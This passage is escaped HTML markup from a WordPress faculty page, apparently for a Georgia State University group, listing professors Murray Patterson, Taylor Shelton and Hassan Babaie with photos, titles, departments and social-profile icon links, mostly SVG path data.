0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-cropped-patterson-e1697143515399.jpg\" class=\"wp-image-1679 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\" class=\"wp-image-1681 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\" class=\"wp-image-1682 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  